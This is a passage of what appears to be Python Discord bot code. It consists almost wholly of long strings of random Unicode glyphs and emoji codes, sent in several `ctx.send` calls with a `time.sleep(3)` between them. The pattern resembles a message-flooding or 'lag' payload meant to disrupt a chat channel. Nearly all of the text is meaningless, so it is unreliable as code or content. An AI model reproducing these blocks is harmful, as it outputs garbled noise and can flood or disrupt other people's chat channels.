⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ႕Βۏᴓ‐૰≅ᓟሦžƱᖑ▔ߝsᴮↆᢓŅဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:wheel_of_dharma:ขଫ") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ≅ᓟሦžƱᖑ▔ᢓဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:whee඿ᡩ᭤ᜧ⎍Ⓩὦ◭⑫ᦺἧ৷ᄩඝ‧⋍zᔛభₓ⑭೜⁾") time.sleep(3) await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒ